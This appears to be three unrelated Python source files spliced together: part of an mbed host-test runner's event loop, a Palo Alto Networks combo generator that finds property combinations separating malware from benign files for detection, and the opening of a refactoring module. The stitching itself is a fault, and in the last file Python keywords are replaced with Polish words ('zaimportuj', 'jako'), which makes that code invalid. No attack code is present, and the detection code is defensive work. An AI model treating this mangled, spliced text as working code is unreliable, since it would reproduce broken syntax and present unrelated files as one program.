"platform_name" : self.options.micro,
"image_path" : self.mbed.image_path,
"skip_reset": self.options.skip_reset,
"tags" : self.options.tag_filters,
"sync_timeout": self.options.sync_timeout
}
if self.options.global_resource_mgr:
grm_module, grm_host, grm_port = self.options.global_resource_mgr.split(':')
config.update({
"conn_resource" : 'grm',
"grm_module" : grm_module,
"grm_host" : grm_host,
"grm_port" : grm_port,
})
if self.options.fast_model_connection:
config.update({
"conn_resource" : 'fmc',
"fm_config" : self.options.fast_model_connection
})
def start_conn_process():
# DUT-host communication process
args = (event_queue, dut_event_queue, config)
p = Process(target=conn_process, args=args)
p.deamon = True
p.start()
return p
def process_code_coverage(key, value, timestamp):
"""! Process the found coverage key value and perform an idle
loop checking for more timeing out if there is no response from
the target within the idle timeout.
@param key The key from the first coverage event
@param value The value from the first coverage event
@param timestamp The timestamp from the first coverage event
@return The elapsed time taken by the processing of code coverage,
and the (key, value, and timestamp) of the next event
"""
original_start_time = time()
start_time = time()
# Perform callback on first event
callbacks[key](key, value, timestamp)
# Start idle timeout loop looking for other events
while (time() - start_time) < coverage_idle_timeout:
try:
(key, value, timestamp) = event_queue.get(timeout=1)
except QueueEmpty:
continue
# If coverage detected use idle loop
# Prevent breaking idle loop for __rxd_line (occurs between keys)
if key == '__coverage_start' or key == '__rxd_line':
start_time = time()
# Perform callback
callbacks[key](key, value, timestamp)
continue
elapsed_time = time() - original_start_time
return elapsed_time, (key, value, timestamp)
p = start_conn_process()
conn_process_started = False
try:
# Wait for the start event. Process start timeout does not apply in
# Global resource manager case as it may take a while for resource
# to be available.
(key, value, timestamp) = event_queue.get(
timeout=None if self.options.global_resource_mgr else self.options.process_start_timeout)
if key == '__conn_process_start':
conn_process_started = True
else:
self.logger.prn_err("First expected event was '__conn_process_start', received '%s' instead"% key)
except QueueEmpty:
self.logger.prn_err("Conn process failed to start in %f sec"% self.options.process_start_timeout)
if not conn_process_started:
p.terminate()
return self.RESULT_TIMEOUT
start_time = time()
try:
consume_preamble_events = True
while (time() - start_time) < timeout_duration:
# Handle default events like timeout, host_test_name, ...
try:
(key, value, timestamp) = event_queue.get(timeout=1)
except QueueEmpty:
continue
# Write serial output to the file if specified in options.
if self.serial_output_file:
if key == '__rxd_line':
with open(self.serial_output_file, "a") as f:
f.write("%s\n" % value)
# In this mode we only check serial output against compare log.
if self.compare_log:
if key == '__rxd_line':
if self.match_log(value):
self.logger.prn_inf("Target log matches compare log!")
result = True
break
if consume_preamble_events:
if key == '__timeout':
# Override default timeout for this event queue
start_time = time()
timeout_duration = int(value) # New timeout
self.logger.prn_inf("setting timeout to: %d sec"% int(value))
elif key == '__version':
self.client_version = value
self.logger.prn_inf("DUT greentea-client version: " + self.client_version)
elif key == '__host_test_name':
# Load dynamically requested host test
self.test_supervisor = self.registry.get_host_test(value)
# Check if host test object loaded is actually host test class
# derived from 'mbed_os_tools.test.BaseHostTest()'
# Additionaly if host test class implements custom ctor it should
# call BaseHostTest().__Init__()
if self.test_supervisor and self.is_host_test_obj_compatible(self.test_supervisor):
# Pass communication queues and setup() host test
self.test_supervisor.setup_communication(event_queue, dut_event_queue, config)
try:
# After setup() user should already register all callbacks
self.test_supervisor.setup()
except (TypeError, ValueError):
# setup() can throw in normal circumstances TypeError and ValueError
self.logger.prn_err("host test setup() failed, reason:")
self.logger.prn_inf("==== Traceback start ====")
for line in traceback.format_exc().splitlines():
print(line)
self.logger.prn_inf("==== Traceback end ====")
result = self.RESULT_ERROR
event_queue.put(('__exit_event_queue', 0, time()))
self.logger.prn_inf("host test setup() call...")
if self.test_supervisor.get_callbacks():
callbacks.update(self.test_supervisor.get_callbacks())
self.logger.prn_inf("CALLBACKs updated")
else:
self.logger.prn_wrn("no CALLBACKs specified by host test")
self.logger.prn_inf("host test detected: %s"% value)
else:
self.logger.prn_err("host test not detected: %s"% value)
result = self.RESULT_ERROR
event_queue.put(('__exit_event_queue', 0, time()))
consume_preamble_events = False
elif key == '__sync':
# This is DUT-Host Test handshake event
self.logger.prn_inf("sync KV found, uuid=%s, timestamp=%f"% (str(value), timestamp))
elif key == '__notify_sync_failed':
# This event is sent by conn_process, SYNC failed
self.logger.prn_err(value)
self.logger.prn_wrn("stopped to consume events due to %s event"% key)
callbacks_consume = False
result = self.RESULT_SYNC_FAILED
event_queue.put(('__exit_event_queue', 0, time()))
elif key == '__notify_conn_lost':
# This event is sent by conn_process, DUT connection was lost
self.logger.prn_err(value)
self.logger.prn_wrn("stopped to consume events due to %s event"% key)
callbacks_consume = False
result = self.RESULT_IO_SERIAL
event_queue.put(('__exit_event_queue', 0, time()))
elif key == '__exit_event_queue':
# This event is sent by the host test indicating no more events expected
self.logger.prn_inf("%s received"% (key))
callbacks__exit_event_queue = True
break
elif key.startswith('__'):
# Consume other system level events
pass
else:
self.logger.prn_err("orphan event in preamble phase: {{%s;%s}}, timestamp=%f"% (key, str(value), timestamp))
else:
# If coverage detected switch to idle loop
if key == '__coverage_start':
self.logger.prn_inf("starting coverage idle timeout loop...")
elapsed_time, (key, value, timestamp) = process_code_coverage(key, value, timestamp)
# Ignore the time taken by the code coverage
timeout_duration += elapsed_time
self.logger.prn_inf("exiting coverage idle timeout loop (elapsed_time: %.2f" % elapsed_time)
if key == '__notify_complete':
# This event is sent by Host Test, test result is in value
# or if value is None, value will be retrieved from HostTest.result() method
self.logger.prn_inf("%s(%s)" % (key, str(value)))
result = value
event_queue.put(('__exit_event_queue', 0, time()))
elif key == '__reset':
# This event only resets the dut, not the host test
dut_event_queue.put(('__reset', True, time()))
elif key == '__reset_dut':
# Disconnect to avoid connection lost event
dut_event_queue.put(('__host_test_finished', True, time()))
p.join()
if value == DefaultTestSelector.RESET_TYPE_SW_RST:
self.logger.prn_inf("Performing software reset.")
# Just disconnecting and re-connecting comm process will soft reset DUT
elif value == DefaultTestSelector.RESET_TYPE_HW_RST:
self.logger.prn_inf("Performing hard reset.")
# request hardware reset
self.mbed.hw_reset()
else:
self.logger.prn_err("Invalid reset type (%s). Supported types [%s]." %
(value, ", ".join([DefaultTestSelector.RESET_TYPE_HW_RST,
DefaultTestSelector.RESET_TYPE_SW_RST])))
self.logger.prn_inf("Software reset will be performed.")
# connect to the device
p = start_conn_process()
elif key == '__notify_conn_lost':
# This event is sent by conn_process, DUT connection was lost
self.logger.prn_err(value)
self.logger.prn_wrn("stopped to consume events due to %s event"% key)
callbacks_consume = False
result = self.RESULT_IO_SERIAL
event_queue.put(('__exit_event_queue', 0, time()))
elif key == '__exit':
# This event is sent by DUT, test suite exited
self.logger.prn_inf("%s(%s)"% (key, str(value)))
callbacks__exit = True
event_queue.put(('__exit_event_queue', 0, time()))
elif key == '__exit_event_queue':
# This event is sent by the host test indicating no more events expected
self.logger.prn_inf("%s received"% (key))
callbacks__exit_event_queue = True
break
elif key in callbacks:
# Handle callback
callbacks[key](key, value, timestamp)
else:
self.logger.prn_err("orphan event in main phase: {{%s;%s}}, timestamp=%f"% (key, str(value), timestamp))
except Exception:
self.logger.prn_err("something went wrong in event main loop!")
self.logger.prn_inf("==== Traceback start ====")
for line in traceback.format_exc().splitlines():
print(line)
self.logger.prn_inf("==== Traceback end ====")
result = self.RESULT_ERROR
time_duration = time() - start_time
self.logger.prn_inf("test suite run finished after %.2f sec..."% time_duration)
if self.compare_log and result is None:
if self.compare_log_idx < len(self.compare_log):
self.logger.prn_err("Expected output [%s] not received in log." % self.compare_log[self.compare_log_idx])
# Force conn_proxy process to return
dut_event_queue.put(('__host_test_finished', True, time()))
p.join()
self.logger.prn_inf("CONN exited with code: %s"% str(p.exitcode))
# Callbacks...
self.logger.prn_inf("No events in queue" if event_queue.empty() else "Some events in queue")
# If host test was used we will:
# 1. Consume all existing events in queue if consume=True
# 2. Check result from host test and call teardown()
# NOTE: with the introduction of the '__exit_event_queue' event, there
# should never be left events assuming the DUT has stopped sending data
# over the serial data. Leaving this for now to catch anything that slips through.
if callbacks_consume:
# We are consuming all remaining events if requested
while not event_queue.empty():
try:
(key, value, timestamp) = event_queue.get(timeout=1)
except QueueEmpty:
break
if key == '__notify_complete':
# This event is sent by Host Test, test result is in value
# or if value is None, value will be retrieved from HostTest.result() method
self.logger.prn_inf("%s(%s)"% (key, str(value)))
result = value
elif key.startswith('__'):
# Consume other system level events
pass
elif key in callbacks:
callbacks[key](key, value, timestamp)
else:
self.logger.prn_wrn(">>> orphan event: {{%s;%s}}, timestamp=%f"% (key, str(value), timestamp))
self.logger.prn_inf("stopped consuming events")
if result is not None: # We must compare here against None!
# Here for example we've received some error code like IOERR_COPY
self.logger.prn_inf("host test result() call skipped, received: %s"% str(result))
else:
if self.test_supervisor:
result = self.test_supervisor.result()
self.logger.prn_inf("host test result(): %s"% str(result))
if not callbacks__exit:
self.logger.prn_wrn("missing __exit event from DUT")
if not callbacks__exit_event_queue:
self.logger.prn_wrn("missing __exit_event_queue event from host test")
#if not callbacks__exit_event_queue and not result:
if not callbacks__exit_event_queue and result is None:
self.logger.prn_err("missing __exit_event_queue event from " + \
"host test and no result from host test, timeout...")
result = self.RESULT_TIMEOUT
self.logger.prn_inf("calling blocking teardown()")
if self.test_supervisor:
self.test_supervisor.teardown()
self.logger.prn_inf("teardown() finished")
return result
def execute(self):
"""! Test runner for host test.
@details This function will start executing test and forward test result via serial port
to test suite. This function is sensitive to work-flow flags such as --skip-flashing,
--skip-reset etc.
First function will flash device with binary, initialize serial port for communication,
reset target. On serial port handshake with test case will be performed. It is when host
test reads property data from serial port (sent over serial port).
At the end of the procedure proper host test (defined in set properties) will be executed
and test execution timeout will be measured.
"""
result = self.RESULT_UNDEF
# hello sting with htrun version, for debug purposes
self.logger.prn_inf(self.get_hello_string())
try:
# Copy image to device
if self.options.skip_flashing:
self.logger.prn_inf("copy image onto target... SKIPPED!")
else:
self.logger.prn_inf("copy image onto target...")
result = self.mbed.copy_image()
if not result:
result = self.RESULT_IOERR_COPY
return self.get_test_result_int(result)
# Execute test if flashing was successful or skipped
test_result = self.run_test()
if test_result == True:
result = self.RESULT_SUCCESS
elif test_result == False:
result = self.RESULT_FAILURE
elif test_result is None:
result = self.RESULT_ERROR
else:
result = test_result
# This will be captured by Greentea
self.logger.prn_inf("{{result;%s}}"% result)
return self.get_test_result_int(result)
except KeyboardInterrupt:
return(-3) # Keyboard interrupt
def match_log(self, line):
"""
Matches lines from compare log with the target serial output. Compare log lines are matched in seq using index
self.compare_log_idx. Lines can be strings to be matched as is or regular expressions.
:param line:
:return:
"""
if self.compare_log_idx < len(self.compare_log):
regex = self.compare_log[self.compare_log_idx]
# Either the line is matched as is or it is checked as a regular expression.
try:
if regex in line or re.search(regex, line):
self.compare_log_idx += 1
except error:
# May not be a regular expression
return False
return self.compare_log_idx == len(self.compare_log)
|
combo_generator.py | """
@author: Min Du (midu@paloaltonetworks.com)
Copyright (c) 2021 Palo Alto Networks
"""
import os
import csv
import time
import math
import random
import logging
import multiprocessing
import numpy as np
from utils import misc
from utils import const
from utils.config_parser import CommonConfig
class ComboGenerator:
"""
Combo Generator
"""
class ComboEvalResult:
TO_EXPEND = 0
IS_COMBO = 1
TO_PRUNE = 2 # and is not combo
# NUM_PROCESS = multiprocessing.cpu_count()
MIN_COMBOS_PER_PROCESS = 2
def __init__(self):
self.logger = logging.getLogger(misc.get_logger_name(__name__))
self.logger.info('Current logging level: %s', self.logger.getEffectiveLevel())
self.property_index_mapping = {} # {property : id}
self.sorted_properties = []
self.integers_to_hit_more = {}
self.min_threshold = -1
self.integers_to_hit_less = {}
self.max_threshold = -1
self.min_combo_size = -1
self.max_combo_size = -1
self.pruned_cand_ints = {}
self.hit_hashes_to_hit_more = set()
self.hit_hashes_to_hit_less = set()
self.start_time = 0
self.properties_to_hit_more = {}
self.properties_to_hit_less = {}
self.pruned_cand_properties = {}
# {combo: [sha256, ...], ...}
self.hashes_to_hit_more_by_combo = {}
self.hashes_to_hit_less_by_combo = {}
# {comboA: comboB, ...}, ...} meaning that comboA is expanded from comboB,
self.parent_combo = {}
# {combo: cnt} means how many child combos are being checked that are expanded from this combo
# when 'ref_cnt' is 0 we can delete its hashes in self.hashes_to_hit_**_by_combo to save memory.
self.combo_ref_cnt = {}
# ablation study and optimizations
self.generation_mode = CommonConfig.get_generation_mode()
self.do_property_sorting = False
self.use_integer_subset = False
self.use_multi_processing = False
self.record_parent_hashes = False
self.NUM_PROCESS = 1
if self.generation_mode == 'ablation_study':
self.do_property_sorting = CommonConfig.get_do_property_sorting()
self.use_integer_subset = CommonConfig.get_use_integer_subset()
else:
self.do_property_sorting = True
self.use_integer_subset = True
if self.generation_mode == 'multi_processing':
self.use_multi_processing = True
self.NUM_PROCESS = CommonConfig.get_num_cores()
elif self.generation_mode == 'store_parent_hits':
self.record_parent_hashes = True
else:
print(f'Generation mode {self.generation_mode} unknown, please check config file.')
self.hit_hash_folder = const.get_generated_combo_hit_hashes_folder()
def generate_combos(self):
summary_to_return = ['Summary: ']
generated_combo_file = const.get_generated_combo_file()
self.logger.info(f'Starting to generate combo file {generated_combo_file}')
summary_to_return.append(f'Generated combos are in file {generated_combo_file}')
# get all related configurations
self.min_combo_size = CommonConfig.get_min_combo_size()
self.max_combo_size = CommonConfig.get_max_combo_size()
self.property_index_mapping = misc.get_property_index_mapping()
# self.logger.debug(f'Loaded property_index_mapping: {self.property_index_mapping}')
with open(const.get_all_sorted_property_file()) as fh:
all_lines = fh.readlines()
property_file_header, property_file_lines = all_lines[0], all_lines[1:]
if self.do_property_sorting:
for ln in property_file_lines:
self.sorted_properties.append(ln.strip().split(',')[0])
else:
not_sorted_property_file = const.get_not_sorted_property_file()
if not os.path.exists(not_sorted_property_file):
random.seed(CommonConfig.get_random_seed())
random.shuffle(property_file_lines)
with open(not_sorted_property_file, 'w') as fh_not:
fh_not.write(property_file_header)
for ln in property_file_lines:
fh_not.write(ln)
with open(not_sorted_property_file) as fh_not:
for ln in fh_not.readlines()[1:]:
self.sorted_properties.append(ln.strip().split(',')[0])
if not self.do_property_sorting:
random.seed(4)
random.shuffle(self.sorted_properties)
start_date, end_date = misc.get_start_end_date_for_combo_generation()
if self.use_integer_subset:
self.integers_to_hit_more = misc.load_property_integers(gt_labels=[1],
start_date=start_date, end_date=end_date)
self.integers_to_hit_less = misc.load_property_integers(gt_labels=[0],
start_date=start_date, end_date=end_date)
else:
self.properties_to_hit_more = misc.load_property_sets(gt_labels=[1],
start_date=start_date, end_date=end_date)
self.properties_to_hit_less = misc.load_property_sets(gt_labels=[0],
start_date=start_date, end_date=end_date)
self.logger.info(f'Finished integer loading. '
f'Statistics: #integers_to_hit_more: {len(self.integers_to_hit_more)}; '
f'#integers_to_hit_less: {len(self.integers_to_hit_less)};')
if self.record_parent_hashes:
self.hashes_to_hit_more_by_combo['root'] = list(self.integers_to_hit_more.keys())
self.hashes_to_hit_less_by_combo['root'] = list(self.integers_to_hit_less.keys())
self.combo_ref_cnt['root'] = 0
# self.logger.debug(f'record_hashes_to_check_per_combo, initial combo_ref_cnt: {self.combo_ref_cnt}')
self.min_threshold = const.get_min_threshold()
self.max_threshold = const.get_max_threshold()
# self.max_threshold = int(const.get_max_threshold() * len(self.integers_to_hit_less))
self.logger.info(f'Start combo generation, min match threshold: {self.min_threshold}; '
f'max match threshold: {self.max_threshold}.')
for i in range(1, self.max_combo_size+1):
# also need to add the ones with self.max_combo_size into pruned_set, in case duplicates are generated
self.pruned_cand_ints[i] = set()
self.pruned_cand_properties[i] = []
# enumerate combos and generate
with open(generated_combo_file, 'w') as cfp:
csv_writer = csv.writer(cfp, delimiter=',')
header = ['candidates', 'all-malware', 'all-benign',
'malware-this-hit-ratio', 'benign-this-hit-ratio', 'malware-this-hit-cnt',
'benign-this-hit-cnt', 'malware-total-ratio-so-far', 'benign-total-ratio-so-far',
'malware-total-cnt-so-far', 'benign-total-cnt-so-far', 'time-elapsed']
csv_writer.writerow(header)
self.start_time = time.time()
properties_previous_step = []
for new_property in self.sorted_properties:
self.logger.info('Adding new property %s', new_property)
if self.record_parent_hashes:
self.parent_combo[new_property] = 'root'
self.combo_ref_cnt['root'] += 1
self.logger.debug(f'record_hashes_to_check_per_combo, adding new property {new_property},'
f'combo_ref_cnt: {self.combo_ref_cnt}')
property_list = [new_property] + properties_previous_step
candidates = [[b] for b in property_list]
property_id_mapping = dict((f, i) for i, f in enumerate(property_list))
while len(candidates) > 0:
new_candidates_potential = []
candidates_to_eval = []
for combo_candidate in candidates:
if combo_candidate[0] in properties_previous_step:
break
candidates_to_eval.append(combo_candidate)
self.logger.info(f'--Time elapsed: {time.time()-self.start_time}, '
f'#combos to evaluate next: {len(candidates_to_eval)}')
if len(candidates_to_eval) == 0:
break
if self.use_multi_processing:
start_time = time.time()
result_array = self.multi_processing(self.check_one_candidate, candidates_to_eval)
self.logger.debug(f'++Time taken to eval each combo: '
f'{(time.time()-start_time) / len(candidates_to_eval)}, '
f'One round of evaluation done. Evaluated candidates: {candidates_to_eval}')
new_candidates_potential += \
self.handle_eval_results(candidates_to_eval, result_array, property_id_mapping,
property_list, csv_writer, cfp)
result_array = self.multi_processing(self.check_candidate_validity, new_candidates_potential)
candidates = []
for idx, nc in enumerate(new_candidates_potential):
if result_array[idx] > 0:
candidates.append(nc)
else:
for cc in candidates_to_eval:
eval_result = self.check_one_candidate_single_process(cc)
self.logger.debug(f'cc: {cc}, eval_result: {eval_result}')
new_candidates_potential += \
self.handle_eval_results([cc], [eval_result], property_id_mapping, property_list,
csv_writer, cfp)
candidates = []
for nc in new_candidates_potential:
if not self.is_pruned(nc):
candidates.append(nc)
if self.record_parent_hashes:
# self.logger.debug(f'record_hashes_to_check_per_combo, add 1 to ref cnt of '
# f'{self.parent_combo["-".join(sorted(nc))]} '
# f'for evaluating its child combo {"-".join(nc)}')
self.combo_ref_cnt[self.parent_combo['-'.join(sorted(nc))]] += 1
if not self.is_pruned([new_property]):
properties_previous_step.append(new_property)
return summary_to_return
def multi_processing(self, func, candidates_to_handle):
result_array = []
if len(candidates_to_handle) > 0:
processes = []
result_array = multiprocessing.Array('i', range(len(candidates_to_handle)))
num_candidates_per_process = self.get_num_candidates_per_process(len(candidates_to_handle))
candidates_to_handle = np.asarray(candidates_to_handle)
for idx in range(0, len(candidates_to_handle), num_candidates_per_process):
idx_range = [x for x in
range(idx, min(len(candidates_to_handle), idx + num_candidates_per_process))]
random.shuffle(idx_range)
new_candidates = candidates_to_handle[idx_range]
p = multiprocessing.Process(target=func, args=(new_candidates, result_array, idx_range))
processes.append(p)
p.start()
for process in processes:
process.join()
return result_array
def get_num_candidates_per_process(self, num_candidates_to_handle):
num_processes = max(
min(self.NUM_PROCESS, math.ceil(num_candidates_to_handle / self.MIN_COMBOS_PER_PROCESS)), 1)
num_candidates_per_process = math.ceil(num_candidates_to_handle / num_processes)
self.logger.info(f'#processes: {num_processes}, #candidates per process: {num_candidates_per_process}')
return num_candidates_per_process
def check_candidate_validity(self, candidates, result_array, idx_range):
for idx, nc in enumerate(candidates):
this_idx = idx_range[idx]
if self.is_pruned(nc):
result_array[this_idx] = 0
else:
result_array[this_idx] = 1
def handle_eval_results(self, candidates, result_array, property_id_mapping, property_list, csv_writer, cfp):
new_candidates_potential = []
for idx, combo in enumerate(candidates):
state = result_array[idx]
if state == self.ComboEvalResult.TO_EXPEND:
self.logger.debug(f'Expanding {combo}.')
if len(combo) < self.max_combo_size:
candidates_to_check = self.get_new_candidates(combo, property_id_mapping=property_id_mapping,
property_list=property_list)
new_candidates_potential += candidates_to_check
elif state == self.ComboEvalResult.IS_COMBO:
self.logger.info(f'generated combo {combo}')
tp_hit_hashes, fp_hit_hashes = set(), set()
if self.use_integer_subset:
full_int = self._get_integer(combo)
self.pruned_cand_ints[len(combo)].add(full_int)
# count unique malware hit now
# count unique malware hit now
if not self.record_parent_hashes:
tp_hit_hashes = \
self.get_hit_hashes(full_int, self.integers_to_hit_more,
hit_hashes_already=self.hit_hashes_to_hit_more)
fp_hit_hashes = \
self.get_hit_hashes(full_int, self.integers_to_hit_less,
hit_hashes_already=self.hit_hashes_to_hit_less)
this_hit_cnt_to_hit_more = len(tp_hit_hashes)
this_hit_cnt_to_hit_less = len(fp_hit_hashes)
else:
parent_combo = self.parent_combo['-'.join(sorted(combo))]
self.logger.debug(f'record_hashes_to_check_per_combo, generated new combo {combo}, '
f'its parent combo is {parent_combo}, '
f'#hashes_to_hit_more: {len(self.hashes_to_hit_more_by_combo[parent_combo])}, '
f'#hashes_to_hit_less: {len(self.hashes_to_hit_less_by_combo[parent_combo])}')
tp_hit_hashes = \
self.get_hit_hashes(full_int, self.integers_to_hit_more,
hit_hashes_already=self.hit_hashes_to_hit_more,
hashes_to_check_by_combo=self.hashes_to_hit_more_by_combo[parent_combo])
fp_hit_hashes = \
self.get_hit_hashes(full_int, self.integers_to_hit_less,
hit_hashes_already=self.hit_hashes_to_hit_less,
hashes_to_check_by_combo=self.hashes_to_hit_less_by_combo[parent_combo])
this_hit_cnt_to_hit_more = len(tp_hit_hashes)
this_hit_cnt_to_hit_less = len(fp_hit_hashes)
self.check_and_cleanup_hashes_by_combo(combo)
self.logger.debug(f'this_hit_cnt_to_hit_more: {this_hit_cnt_to_hit_more}, '
f'this_hit_cnt_to_hit_less: {this_hit_cnt_to_hit_less}')
total_cnt_to_hit_more = len(self.integers_to_hit_more)
total_cnt_to_hit_less = len(self.integers_to_hit_less)
else:
combo = set(combo)
self.pruned_cand_properties[len(combo)].append(combo)
tp_hit_hashes = self.get_hit_hashes_by_properties(combo, self.properties_to_hit_more,
self.hit_hashes_to_hit_more)
fp_hit_hashes = self.get_hit_hashes_by_properties(combo, self.properties_to_hit_less,
self.hit_hashes_to_hit_less)
this_hit_cnt_to_hit_more = len(tp_hit_hashes)
this_hit_cnt_to_hit_less = len(fp_hit_hashes)
total_cnt_to_hit_more = len(self.properties_to_hit_more)
total_cnt_to_hit_less = len(self.properties_to_hit_less)
###
with open(os.path.join(self.hit_hash_folder, f'{"-".join(sorted(combo))}.tp'), 'w') as fh:
for hh in tp_hit_hashes:
fh.write(f'{hh}\n')
with open(os.path.join(self.hit_hash_folder, f'{"-".join(sorted(combo))}.fp'), 'w') as fh:
for hh in fp_hit_hashes:
fh.write(f'{hh}\n')
###
sofar_hit_cnt_to_hit_more = len(self.hit_hashes_to_hit_more)
sofar_hit_cnt_to_hit_less = len(self.hit_hashes_to_hit_less)
one_row = ['-'.join(sorted(combo)), total_cnt_to_hit_more, total_cnt_to_hit_less,
f'{this_hit_cnt_to_hit_more * 100 / total_cnt_to_hit_more}',
f'{this_hit_cnt_to_hit_less * 100 / total_cnt_to_hit_less}',
this_hit_cnt_to_hit_more, this_hit_cnt_to_hit_less,
f'{sofar_hit_cnt_to_hit_more * 100 / total_cnt_to_hit_more: .3f}',
f'{sofar_hit_cnt_to_hit_less * 100 / total_cnt_to_hit_less: .3f}',
f'{sofar_hit_cnt_to_hit_more}', f'{sofar_hit_cnt_to_hit_less}',
f'{time.time() - self.start_time: .3f}']
csv_writer.writerow(one_row)
cfp.flush()
else:
self.logger.info(f'Combo {combo} did not hit enough hashes_to_hit_more, add it to prune list')
if self.use_integer_subset:
full_int = self._get_integer(combo)
self.pruned_cand_ints[len(combo)].add(full_int)
if self.record_parent_hashes:
self.logger.debug(f'record_hashes_to_check_per_combo, pruning combo {combo}')
self.check_and_cleanup_hashes_by_combo(combo)
else:
self.pruned_cand_properties[len(combo)].append(set(combo))
return new_candidates_potential
def check_and_cleanup_hashes_by_combo(self, child_combo):
# free memory
parent_combo = self.parent_combo['-'.join(sorted(child_combo))]
self.logger.debug(f'record_hashes_to_check_per_combo, to cleanup for combo {child_combo}, '
f'its parent combo is {parent_combo}, '
f'self.combo_ref_cnt[parent_combo]: {self.combo_ref_cnt[parent_combo]}')
self.combo_ref_cnt[parent_combo] -= 1
del self.parent_combo['-'.join(sorted(child_combo))]
if self.combo_ref_cnt[parent_combo] == 0 and parent_combo != 'root':
del self.hashes_to_hit_more_by_combo[parent_combo]
del self.hashes_to_hit_less_by_combo[parent_combo]
self.logger.debug(f'record_hashes_to_check_per_combo, deleted hashes for combo {parent_combo}')
def check_one_candidate(self, combo_candidate, eval_result, idx_range):
for idx, cc in enumerate(combo_candidate):
this_idx = idx_range[idx]
full_int = self._get_integer(cc)
if self.hit_many(full_int, self.integers_to_hit_more, self.min_threshold-1):
if self.hit_many(full_int, self.integers_to_hit_less, self.max_threshold):
eval_result[this_idx] = self.ComboEvalResult.TO_EXPEND
else: # generated one
eval_result[this_idx] = self.ComboEvalResult.IS_COMBO
else:
eval_result[this_idx] = self.ComboEvalResult.TO_PRUNE
def check_one_candidate_single_process(self, cc):
if self.use_integer_subset:
full_int = self._get_integer(cc)
if not self.record_parent_hashes:
if self.hit_many(full_int, self.integers_to_hit_more, self.min_threshold-1):
if self.hit_many(full_int, self.integers_to_hit_less, self.max_threshold):
return self.ComboEvalResult.TO_EXPEND
else: # generated one
return self.ComboEvalResult.IS_COMBO
else:
return self.ComboEvalResult.TO_PRUNE
else:
combo_str = '-'.join(sorted(cc))
hashes_to_hit_more = self.get_hit_hashes(full_int, self.integers_to_hit_more,
self.hashes_to_hit_more_by_combo[self.parent_combo[combo_str]])
if len(hashes_to_hit_more) > self.min_threshold-1:
hashes_to_hit_less = self.get_hit_hashes(full_int, self.integers_to_hit_less,
self.hashes_to_hit_less_by_combo[self.parent_combo[combo_str]])
if len(hashes_to_hit_less) > self.max_threshold:
self.hashes_to_hit_more_by_combo[combo_str] = hashes_to_hit_more
self.hashes_to_hit_less_by_combo[combo_str] = hashes_to_hit_less
self.combo_ref_cnt[combo_str] = 0
self.logger.debug(f'record_hashes_to_check_per_combo, generated hit_hashes for combo {cc}, '
f'#hashes_to_hit_more_by_combo[combo]: '
f'{len(self.hashes_to_hit_more_by_combo[combo_str])}, '
f'#hashes_to_hit_less_by_combo[combo]: '
f'{len(self.hashes_to_hit_less_by_combo[combo_str])}')
return self.ComboEvalResult.TO_EXPEND
else:
return self.ComboEvalResult.IS_COMBO
else:
return self.ComboEvalResult.TO_PRUNE
else:
# full_int = self._get_integer(cc)
cc = set(cc)
if not self.record_parent_hashes:
if self.hit_many_by_properties(cc, self.properties_to_hit_more, self.min_threshold-1):
if self.hit_many_by_properties(cc, self.properties_to_hit_less, self.max_threshold):
return self.ComboEvalResult.TO_EXPEND
else: # generated one
return self.ComboEvalResult.IS_COMBO
else:
return self.ComboEvalResult.TO_PRUNE
def hit_many(self, this_int, all_ints_to_check, max_cnt, hashes_to_check_by_combo=None):
if hashes_to_check_by_combo is None:
hashes_to_check_by_combo = list(all_ints_to_check.keys())
cnt = 0
for sha256 in hashes_to_check_by_combo:
integer = all_ints_to_check[sha256]
if self.first_in_second(this_int, integer):
cnt += 1
if cnt > max_cnt: # todo: uncomment after debugging
return True
return False
def hit_many_by_properties(self, property_set_to_check, all_property_sets_to_check, max_cnt):
cnt = 0
for sha256, property_set in all_property_sets_to_check.items():
# self.logger.debug(f'check if property_set_to_check {property_set_to_check} a subset of {property_set}')
if self.first_in_second_properties(property_set_to_check, property_set):
cnt += 1
if cnt > max_cnt: # todo: uncomment after debugging
return True
return False
def get_hit_hashes(self, full_int, all_ints_to_check, hashes_to_check_by_combo=None, hit_hashes_already=None):
if hashes_to_check_by_combo is None:
hashes_to_check_by_combo = list(all_ints_to_check.keys())
hit_hashes = set()
self.logger.debug(f'len(hashes_to_check_by_combo): {len(hashes_to_check_by_combo)}')
for sha256 in hashes_to_check_by_combo:
integer = all_ints_to_check[sha256]
if self.first_in_second(full_int, integer):
hit_hashes.add(sha256)
if hit_hashes_already is not None:
hit_hashes_already.update(hit_hashes)
return hit_hashes
def get_hit_hashes_by_properties(self, property_set_to_check, all_property_sets_to_check, hit_hashes_already):
hit_count = 0
hit_hashes = set()
for sha256, property_set in all_property_sets_to_check.items():
if self.first_in_second_properties(property_set_to_check, property_set):
hit_count += 1
hit_hashes.add(sha256)
hit_hashes_already.add(sha256)
return hit_hashes
def get_new_candidates(self, combo, property_id_mapping, property_list):
cur_candidate = combo[-1]
cur_id = property_id_mapping[cur_candidate]
ret = []
for property in property_list[cur_id+1:]:
new_candidate = list(combo) + [property]
if self.record_parent_hashes:
self.parent_combo['-'.join(sorted(new_candidate))] = '-'.join(sorted(combo))
ret.append(new_candidate)
return ret
def is_pruned(self, new_candidate):
if self.use_integer_subset:
new_int = self._get_integer(new_candidate)
for length, ints in self.pruned_cand_ints.items():
if length > len(new_candidate):
continue
for candidate_int in self.pruned_cand_ints[length]:
if self.first_in_second(candidate_int, new_int):
return True
return False
else:
for length, property_set_lists in self.pruned_cand_properties.items():
if length > len(new_candidate):
continue
for property_set in property_set_lists:
if self.first_in_second_properties(property_set, new_candidate):
self.logger.debug(f'Prune combo {new_candidate} '
f'because it is a superset of previous pruned combo {property_set}')
return True
return False
def first_in_second(self, first_int, second_int):
return first_int & second_int == first_int
def first_in_second_properties(self, first_set, second_set):
return first_set.issubset(second_set)
def _get_integer(self, properties):
ret = 0
for b in properties:
if b not in self.property_index_mapping:
return -1
ret |= 1 << self.property_index_mapping[b]
return ret
def _get_property_combo(self, integer):
ret = set()
for property, idx in self.property_index_mapping.items():
if integer & (1 << idx):
ret.add(property)
return ret
|
refactor.py | # Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Refactoring framework.
Used jako a main program, this can refactor any number of files and/or
recursively descend down directories. Imported jako a module, this
provides infrastructure to write your own refactoring tool.
"""
z __future__ zaimportuj with_statement
__author__ = "Guido van Rossum <guido@python.org>"
# Python imports
zaimportuj os
zaimportuj sys
zaimportuj logging
zaimportuj operator
zaimportuj collections
zaimportuj io
z itertools zaimportuj chain
# Local imports
